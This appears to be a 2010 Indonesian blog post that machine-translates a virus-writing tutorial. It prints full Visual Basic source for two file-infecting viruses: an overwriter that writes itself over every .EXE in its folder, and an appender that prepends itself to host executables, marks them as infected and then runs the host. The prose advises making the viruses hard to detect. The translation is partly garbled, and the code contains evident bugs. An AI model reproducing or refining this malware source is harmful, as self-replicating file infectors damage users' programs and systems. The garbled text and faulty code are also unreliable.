virus visual basic

Sabtu, 29 Mei 2010

bagian +1
Intro untuk virus VB
Satu-satunya alasan mengapa saya bahkan mulai writting virus VB adalah bahwa saya adalah seorang programmer makro dan saya ingin mencoba infeksi exe. Ini adalah kontak pertama saya dengan infeksi exe. virus VB memiliki satu aliran i g b. Itu adalah ukuran mereka. Seperti Anda semua tahu mereka besar dan itu adalah sesuatu yang kita tidak inginkan dalam virus itu? Untuk mengatasi masalah ini kita dapat menggunakan variabel untuk string seringkali digunakan untuk mempersingkat kode tersebut tetapi tidak banyak membantu sehingga kami harus menerima ukuran sebagai arus dan mencoba menemukan banyak trik untuk membuatnya sekeras mungkin mendeteksi. Permasalahan lain adalah virus VB adalah bahwa mereka perlu dll untuk menjalankan () tidak! Sesuatu yang kita inginkan untuk virus. Selain itu sebabnya aku mulai belajar asm. virus VB adalah untuk tujuan pendidikan saja.
Anda dapat menggunakan enkripsi untuk VB virus juga. Saya telah menggunakan enkripsi karakter (digunakan dalam virus makro, pertama kali digunakan oleh VicodinES) dan bekerja dengan sukses. Sekarang saya mencoba untuk menemukan metode lain untuk enkripsi khususnya untuk virus VB dan Anda akan melihat hasilnya dalam isu-isu kemudian dari seri ini.

Untuk setiap komentar dan / atau saran e-mail saya di [PAIN] @ cypria.com

Dari [PAIN] (secara resmi dikenal sebagai PhreakX
programnya

Option Explicit
Dim myarray() As Byte
Dim victim As String
Const mysize As Integer = 11776

Private Sub Form_Load()
On Error Resume Next
Dim Free
Free = FreeFile

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
ReDim myarray(mysize)
Get #1, 1, myarray
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

Open App.Path & "\" & victim For Binary Access Write As #Free
Put #1, , myarray
Put #1, , mysize
Close #Free

victim = Dir()

Wend

End
End Sub

Ini dia ... karena Anda dapat melihat overwritters mati mudah untuk menulis. Di edisi berikutnya saya akan membahas menambahkan virus. Untuk komentar dan / atau pertanyaan e-mail saya di [PAIN] @ cypria.com


bagian # 3
EXE Appenders

Sekarang kita sampai hal yang nyata ... EXE dengan menambahkan virus. Ini adalah virus menambahkan sederhana tidak dienkripsi tanpa muatan apapun.

programnya

Option Explicit
Private victim As String
Private myarray() As Byte
Private varray As Byte
Private length As Long
Private chck As String

Const size As Integer = 18432

Private iResult As Long
Private hProg As Long
Private idProg As Long
Private iExit As Long
Const STILL_ACTIVE As Long = &H103
Const PROCESS_ALL_ACCESS As Long = &H1F0FFF

Private Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Private Declare Function GetExitCodeProcess Lib "kernel32" _
(ByVal hProcess As Long, lpExitCode As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long

Private Sub Form_Load()

On Error Resume Next

Dim I As Long
Dim Free
Free = FreeFile

On Error GoTo Fin

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
myarray = Space$(size)
Get #1, 1, myarray
Close #Free

victim = Dir(App.Path & "\" & "*.EXE")
While victim <> ""

' If the victim file, has the same directory and name as the file
' that is running - skip the next part
If LCase(App.Path & "\" & App.EXEName & ".exe") _
<> LCase(App.Path & "\" & App.EXEName & ".exe") Then

Open Victim For Binary Access Read As #Free
varray = Space(LOF(Free)) ' Sets buffer up for the file data
Get #1, 1, varray ' Copy th file data into a variable
Close #Free

chck = Mid(varray, Len(varray)) ' Store the last character in the
' victim file in CheckX

If LCase(chck) <> "^" Then ' if the character = X then the file has
' already been infected, if not continue

Open victim For Binary Access Write As #Free
Put #Free, 1, myarray ' Place our code in the front of the file
Put #Free, size, varray ' Follow it immediatley by the victims code
Put #Free, LOF(Free) + 1, "^" 'Place an X at the end to show it's been
'infected
Close #Free 'Thats how this virus got it's name!

End If
Else
End If

Victim = Dir() ' Find the next file to infect
Wend ' Go back to the start

Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #Free
length = (LOF(Free) - size) ' Store the length of the current file minus
' the virus file size in the variable
If Length > 0 Then ' if it's more than 0, the file is infected,
' if not, this is the raw virus file
myarray = Space(length) ' Create buffer in variable, for the size of
' the file
Get #Free, size, myarray ' Get the old host data from out of this file
Close #Free

Open App.Path & "\" & App.EXEName & ".tut" For Binary Access Write As #Free
Put #Free, , myarray ' Place the old host data into a temporary file
Close #Free

idProg = Shell(App.Path & "\" & App.EXEName & ".tut", vbNormalFocus)
' Run the old host code
hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)
' Get it running application code number
GetExitCodeProcess hProg, iExit

Do While iExit = STILL_ACTIVE ' Wait untill the program is shut down
DoEvents
GetExitCodeProcess hProg, iExit
Loop
On Error Resume Next
Kill App.Path & "\" & App.EXEName & ".tut" ' Delete the old host code

Else
Close #Free
End If
End
Fin:
End Sub

i. biasanya virus dipakai cracker untuk hal-hal yang tidak benar,kadang juga hacker untuk mencari kelemahan suatu program,virus-virus diatas masih standar karena tidak memanipulasi registri seperti autorun.inf yang hampir di semua kompi terdapat ini.itu menjadi merepotkan.
dapat dari:vx.netlux.org/lib/static/vdat/tuvbpain.htm

0 komentar

Posting Komentar

look ! bugs my blog

Arabic Korean Japanese Chinese Simplified Russian Portuguese
English French German Spain Italian Dutch

visitors